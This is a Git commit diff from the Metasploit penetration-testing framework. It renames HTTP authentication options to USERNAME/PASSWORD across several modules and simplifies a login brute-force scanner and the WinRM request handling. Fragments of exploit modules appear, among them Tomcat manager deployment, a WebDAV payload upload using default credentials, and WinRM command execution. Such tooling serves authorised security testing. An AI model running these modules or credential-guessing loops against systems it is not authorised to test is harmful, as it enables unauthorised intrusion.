last of revert-merge snaffu
parent
6abbbeb3ca
commit
0ae489b37b
|
@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary
|
|||
))
|
||||
|
||||
# disabling all the unnecessary options that someone might set to break our query
|
||||
deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN',
|
||||
deregister_options('RPORT','RHOST', 'DOMAIN',
|
||||
'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM',
|
||||
'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session',
|
||||
'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL')
|
||||
'NTLM::UseNTLMv2','SSL')
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
|
|
@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'Cisco Device HTTP Device Manager Access',
|
||||
'Description' => %q{
|
||||
This module gathers data from a Cisco device (router or switch) with the device manager
|
||||
web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify
|
||||
web interface exposed. The USERNAME and PASSWORD options can be used to specify
|
||||
authentication.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
|
||||
|
||||
# Report a vulnerability only if no password was specified
|
||||
if datastore['BasicAuthPass'].to_s.length == 0
|
||||
if datastore['PASSWORD'].to_s.length == 0
|
||||
|
||||
report_vuln(
|
||||
{
|
||||
|
|
|
@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
|
||||
end
|
||||
|
||||
def find_auth_uri_and_scheme
|
||||
def find_auth_uri
|
||||
|
||||
path_and_scheme = []
|
||||
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
|
||||
paths = [datastore['AUTH_URI']]
|
||||
else
|
||||
|
@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
next if not res
|
||||
end
|
||||
|
||||
next if not res.code == 401
|
||||
next if not res.headers['WWW-Authenticate']
|
||||
path_and_scheme << path
|
||||
case res.headers['WWW-Authenticate']
|
||||
when /Basic/i
|
||||
path_and_scheme << "Basic"
|
||||
when /NTLM/i
|
||||
path_and_scheme << "NTLM"
|
||||
when /Digest/i
|
||||
path_and_scheme << "Digest"
|
||||
end
|
||||
return path_and_scheme
|
||||
return path
|
||||
end
|
||||
|
||||
return path_and_scheme
|
||||
return path
|
||||
end
|
||||
|
||||
def target_url
|
||||
|
@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("You need need to set AUTH_URI when using PUT Method !")
|
||||
return
|
||||
end
|
||||
@uri, @scheme = find_auth_uri_and_scheme()
|
||||
@uri = find_auth_uri
|
||||
if ! @uri
|
||||
print_error("#{target_url} No URI found that asks for HTTP authentication")
|
||||
return
|
||||
|
@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
@uri = "/#{@uri}" if @uri[0,1] != "/"
|
||||
|
||||
if ! @scheme
|
||||
print_error("#{target_url} Incompatible authentication scheme")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Attempting to login to #{target_url} with #{@scheme} authentication")
|
||||
print_status("Attempting to login to #{target_url}")
|
||||
|
||||
each_user_pass { |user, pass|
|
||||
do_login(user, pass)
|
||||
|
@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def do_login(user='admin', pass='admin')
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
success = false
|
||||
proof = ""
|
||||
|
||||
ret = do_http_login(user,pass,@scheme)
|
||||
return :abort if ret == :abort
|
||||
if ret == :success
|
||||
proof = @proof.dup
|
||||
success = true
|
||||
end
|
||||
response = do_http_login(user,pass)
|
||||
result = determine_result(response)
|
||||
|
||||
if success
|
||||
if result == :success
|
||||
print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
|
||||
|
||||
any_user = false
|
||||
any_pass = false
|
||||
|
||||
vprint_status("#{target_url} - Trying random username with password:'#{pass}'")
|
||||
any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme)
|
||||
any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass))
|
||||
|
||||
vprint_status("#{target_url} - Trying username:'#{user}' with random password")
|
||||
any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme)
|
||||
any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8)))
|
||||
|
||||
if any_user == :success
|
||||
user = "anyuser"
|
||||
|
@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:sname => (ssl ? 'https' : 'http'),
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:proof => "WEBAPP=\"Generic\", PROOF=#{proof}",
|
||||
:proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
|
||||
:source_type => "user_supplied",
|
||||
:active => true
|
||||
)
|
||||
|
@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
|
||||
def do_http_login(user,pass,scheme)
|
||||
case scheme
|
||||
when /NTLM/i
|
||||
do_http_auth_ntlm(user,pass)
|
||||
when /Digest/i
|
||||
do_http_auth_digest(user,pass,datastore['REQUESTTYPE'])
|
||||
when /Basic/i
|
||||
do_http_auth_basic(user,pass)
|
||||
else
|
||||
vprint_error("#{target_url}: Unknown authentication scheme")
|
||||
return :abort
|
||||
end
|
||||
end
|
||||
|
||||
def do_http_auth_ntlm(user,pass)
|
||||
def do_http_login(user,pass)
|
||||
begin
|
||||
resp,c = send_http_auth_ntlm(
|
||||
response = send_request_cgi({
|
||||
'uri' => @uri,
|
||||
'method' => datastore['REQUESTTYPE'],
|
||||
'username' => user,
|
||||
'password' => pass
|
||||
)
|
||||
c.close
|
||||
return :abort if (resp.code == 404)
|
||||
|
||||
if [200, 301, 302].include?(resp.code)
|
||||
@proof = resp
|
||||
return :success
|
||||
end
|
||||
|
||||
})
|
||||
return response
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
||||
return :abort
|
||||
return nil
|
||||
end
|
||||
|
||||
return :fail
|
||||
end
|
||||
|
||||
def do_http_auth_basic(user,pass)
|
||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
||||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => @uri,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{user_pass}",
|
||||
}
|
||||
}, 25)
|
||||
|
||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||
vprint_error("#{target_url} not responding")
|
||||
return :abort
|
||||
end
|
||||
|
||||
return :abort if (res.code == 404)
|
||||
|
||||
if [200, 301, 302].include?(res.code)
|
||||
@proof = res
|
||||
return :success
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
||||
return :abort
|
||||
end
|
||||
|
||||
return :fail
|
||||
end
|
||||
|
||||
def do_http_auth_digest(user,pass,requesttype)
|
||||
path = datastore['AUTH_URI'] || "/"
|
||||
begin
|
||||
if requesttype == "PUT"
|
||||
res,c = send_digest_request_cgi({
|
||||
'uri' => path,
|
||||
'method' => requesttype,
|
||||
'data' => 'Test123\r\n',
|
||||
#'DigestAuthIIS' => false,
|
||||
'DigestAuthUser' => user,
|
||||
'DigestAuthPassword' => pass
|
||||
}, 25)
|
||||
elsif requesttype == "PROPFIND"
|
||||
res,c = send_digest_request_cgi({
|
||||
'uri' => path,
|
||||
'method' => requesttype,
|
||||
'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>',
|
||||
#'DigestAuthIIS' => false,
|
||||
'DigestAuthUser' => user,
|
||||
'DigestAuthPassword' => pass,
|
||||
'headers' => { 'Depth' => '0'}
|
||||
}, 25)
|
||||
else
|
||||
res,c = send_digest_request_cgi({
|
||||
'uri' => path,
|
||||
'method' => requesttype,
|
||||
#'DigestAuthIIS' => false,
|
||||
'DigestAuthUser' => user,
|
||||
'DigestAuthPassword' => pass
|
||||
}, 25)
|
||||
end
|
||||
|
||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||
vprint_error("#{target_url} not responding")
|
||||
return :abort
|
||||
end
|
||||
|
||||
return :abort if (res.code == 404)
|
||||
|
||||
if ( [200, 301, 302].include?(res.code) ) or (res.code == 201)
|
||||
if ((res.code == 201) and (requesttype == "PUT"))
|
||||
print_good("Trying to delete #{path}")
|
||||
del_res,c = send_digest_request_cgi({
|
||||
'uri' => path,
|
||||
'method' => 'DELETE',
|
||||
'DigestAuthUser' => user,
|
||||
'DigestAuthPassword' => pass
|
||||
}, 25)
|
||||
if not (del_res.code == 204)
|
||||
print_error("#{path} could be created, but not deleted again. This may have been noisy ...")
|
||||
end
|
||||
end
|
||||
@proof = res
|
||||
return :success
|
||||
end
|
||||
|
||||
if (res.code == 207) and (requesttype == "PROPFIND")
|
||||
@proof = res
|
||||
return :success
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{target_url} - Failed to connect to the web server")
|
||||
return :abort
|
||||
end
|
||||
|
||||
def determine_result(response)
|
||||
return :abort unless response.kind_of? Rex::Proto::Http::Response
|
||||
return :abort unless response.code
|
||||
return :success if [200, 301, 302].include?(response.code)
|
||||
return :fail
|
||||
end
|
||||
|
||||
|
|
|
@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'")
|
||||
success = false
|
||||
srvhdr = '?'
|
||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Authorization' => "Basic #{user_pass}",
|
||||
}
|
||||
'username' => user,
|
||||
'password' => pass
|
||||
}, 25)
|
||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
|
||||
|
|
|
@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run_host(ip)
|
||||
unless accepts_ntlm_auth
|
||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
||||
return
|
||||
end
|
||||
streams = winrm_run_cmd(datastore['CMD'])
|
||||
return unless streams.class == Hash
|
||||
print_error streams['stderr'] unless streams['stderr'] == ''
|
||||
|
|
|
@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run_host(ip)
|
||||
unless accepts_ntlm_auth
|
||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
||||
return
|
||||
end
|
||||
each_user_pass do |user, pass|
|
||||
resp,c = send_request_ntlm(test_request)
|
||||
resp = send_winrm_request(test_request)
|
||||
if resp.nil?
|
||||
print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out"
|
||||
return
|
||||
|
|
|
@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
|
||||
def run_host(ip)
|
||||
unless accepts_ntlm_auth
|
||||
print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth"
|
||||
return
|
||||
end
|
||||
|
||||
resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL']))
|
||||
resp = send_winrm_request(winrm_wql_msg(datastore['WQL']))
|
||||
if resp.nil?
|
||||
print_error "Got no reply from the server"
|
||||
return
|
||||
|
|
|
@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol'])
|
||||
], self.class)
|
||||
|
||||
deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword',
|
||||
'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
|
||||
deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey',
|
||||
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2')
|
||||
end
|
||||
|
||||
|
|
|
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
|
||||
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']),
|
||||
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']),
|
||||
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
if res.code == 401
|
||||
print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!")
|
||||
print_error("401 Authorization Required! Our Credentials not accepted!")
|
||||
elsif (res.code == 200 and res.body =~ /The passwords you supplied match/)
|
||||
print_status("Command successfully executed (according to the server).")
|
||||
end
|
||||
|
|
|
@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
authmsg = res.headers['WWW-Authenticate']
|
||||
end
|
||||
print_error("The remote server responded expecting authentication")
|
||||
if datastore['BasicAuthUser'] and datastore['BasicAuthPass']
|
||||
print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser'])
|
||||
elsif authmsg
|
||||
if authmsg
|
||||
print_error("WWW-Authenticate: %s" % authmsg)
|
||||
end
|
||||
cleanup_instructions(rpath, name) # display cleanup info
|
||||
|
|
|
@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
||||
|
||||
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
||||
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
||||
|
||||
|
|
|
@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
||||
|
||||
jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
|
||||
app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
|
||||
|
||||
|
|
|
@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
||||
|
||||
res = query_serverinfo
|
||||
disconnect
|
||||
return CheckCode::Unknown if res.nil?
|
||||
|
@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:host => rhost,
|
||||
:port => rport,
|
||||
:sname => (ssl ? "https" : "http"),
|
||||
:user => datastore['BasicAuthUser'],
|
||||
:pass => datastore['BasicAuthPass'],
|
||||
:user => datastore['USERNAME'],
|
||||
:pass => datastore['PASSWORD'],
|
||||
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
||||
:active => true
|
||||
)
|
||||
|
@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
||||
|
||||
mytarget = target
|
||||
if (target.name =~ /Automatic/)
|
||||
mytarget = auto_target
|
||||
|
@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
:host => rhost,
|
||||
:port => rport,
|
||||
:sname => (ssl ? "https" : "http"),
|
||||
:user => datastore['BasicAuthUser'],
|
||||
:pass => datastore['BasicAuthPass'],
|
||||
:user => datastore['USERNAME'],
|
||||
:pass => datastore['PASSWORD'],
|
||||
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
|
||||
:active => true
|
||||
)
|
||||
|
|
|
@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def go(command)
|
||||
datastore['BasicAuthUser'] = datastore['USERNAME']
|
||||
datastore['BasicAuthPass'] = datastore['PASSWORD']
|
||||
|
||||
xml = <<-EOS
|
||||
<?xml version="1.0"?>
|
||||
<methodCall>
|
||||
|
|
|
@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
|
||||
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
|
||||
OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
|
||||
OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
|
@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
||||
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
||||
OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']),
|
||||
OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp'])
|
||||
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
uri = build_path
|
||||
print_status "Uploading Payload to #{uri}"
|
||||
res,c = send_digest_request_cgi({
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
'method' => 'PUT',
|
||||
'data' => payload.raw,
|
||||
'DigestAuthUser' => datastore['RUSER'],
|
||||
'DigestAuthPassword' => datastore['RPASS']
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
}, 25)
|
||||
unless (res and res.code == 201)
|
||||
print_error "Failed to upload file!"
|
||||
|
|
|
@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
@compat_mode = false
|
||||
end
|
||||
|
||||
def check
|
||||
unless accepts_ntlm_auth
|
||||
print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth"
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
||||
return
|
||||
end
|
||||
unless valid_login?
|
||||
print_error "Login Failure. Recheck your credentials"
|
||||
return
|
||||
|
@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def temp_dir
|
||||
print_status "Grabbing %TEMP%"
|
||||
resp,c = send_request_ntlm(winrm_open_shell_msg)
|
||||
resp = send_winrm_request(winrm_open_shell_msg)
|
||||
if resp.nil?
|
||||
print_error "Got no reply from the server"
|
||||
return nil
|
||||
|
@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
shell_id = winrm_get_shell_id(resp)
|
||||
cmd = "echo %TEMP%"
|
||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
|
||||
resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id))
|
||||
cmd_id = winrm_get_cmd_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
|
||||
resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id))
|
||||
streams = winrm_get_cmd_streams(resp)
|
||||
return streams['stdout'].chomp
|
||||
end
|
||||
|
||||
def check_remote_arch
|
||||
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
|
||||
resp,c = send_request_ntlm(winrm_wql_msg(wql))
|
||||
resp = send_winrm_request(winrm_wql_msg(wql))
|
||||
#Default to x86 if we can't be sure
|
||||
return "x86" if resp.nil? or resp.code != 200
|
||||
resp_tbl = parse_wql_response(resp)
|
||||
|
@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def valid_login?
|
||||
data = winrm_wql_msg("Select Name,Status from Win32_Service")
|
||||
resp,c = send_request_ntlm(data)
|
||||
resp = send_winrm_request(data)
|
||||
unless resp.code == 200
|
||||
return false
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue